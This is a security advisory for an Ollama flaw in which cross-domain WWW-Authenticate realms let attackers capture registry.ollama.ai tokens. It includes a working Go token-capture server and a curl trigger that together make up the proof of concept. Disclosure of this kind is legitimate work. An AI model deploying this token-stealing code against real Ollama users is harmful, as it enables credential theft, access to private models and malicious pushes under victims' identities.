CVE-2025-51471: Ollama Cross-Domain Authentication Token Exposure

May 16, 2025 by Gecko Security Research · Medium 6.9

Authentication flow vulnerability in Ollama's model pulling mechanism allowing cross-domain token redirection and theft.

Original finding credits:

Mohammed Benhelli @Fuzzinglabs
Patrick Ventuzelo @Fuzzinglabs
Date: 24/12/2024
Link: https://huntr.com/bounties/94eea285-fd65-4e01-a035-f533575ebdc2

Below is our duplicate finding. Edit made on October 13th, 2025.

Description

Ollama's authentication flow contains a vulnerability in its model pulling mechanism. When a user pulls a model from an HTTPS server that responds with a 401 Unauthorized status, Ollama follows the WWW-Authenticate header's realm URL without validating if it belongs to the same domain as the original request. This allows an attacker to redirect the authentication flow to any domain, including registry.ollama.ai, and capture valid authentication tokens.

The issue exists in the authentication challenge handling logic, where Ollama does not verify that the authentication realm in the WWW-Authenticate header is from the same domain as the initial request. This enables cross-domain authentication flow redirection and token stealing.

Proof of Concept

This PoC demonstrates how an attacker can steal valid registry.ollama.ai authentication tokens:

Start the Ollama server:

bash

go run main.go serve

Create token-capture server (token_capture.go):

package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        fmt.Printf("Request: %s %s\n", r.Method, r.URL.String())
        
        if r.Header.Get("Authorization") == "" {
            w.Header().Set("WWW-Authenticate", `Bearer realm="https://registry.ollama.ai/v2/token",service="ollama",scope="-"`)
            w.WriteHeader(http.StatusUnauthorized)
            w.Write([]byte("Unauthorized"))
            return
        }
        
        fmt.Printf("STOLEN TOKEN: %s\n", r.Header.Get("Authorization"))
        w.WriteHeader(http.StatusTeapot)
        w.Write([]byte("Token captured"))
    })
    
    log.Fatal(http.ListenAndServe(":8000", nil))
}

Run the token capture server:

bash

go run token_capture.go

Trigger the vulnerability:

bash

curl http://localhost:11434/api/pull -d '{
  "model": "http://127.0.0.1:8000/{model}",
}'

Observe the stolen token in the server output.

Impact

This vulnerability allows attackers to:

Steal authentication tokens for registry.ollama.ai by tricking users into pulling models from malicious servers
Access private models the user has permission to access in the registry
Push malicious models under the victim's identity if they have write access

Product

Ollama

Vendor

Ollama

Version

0.6.7

CVSS

6.9

Summarize with AI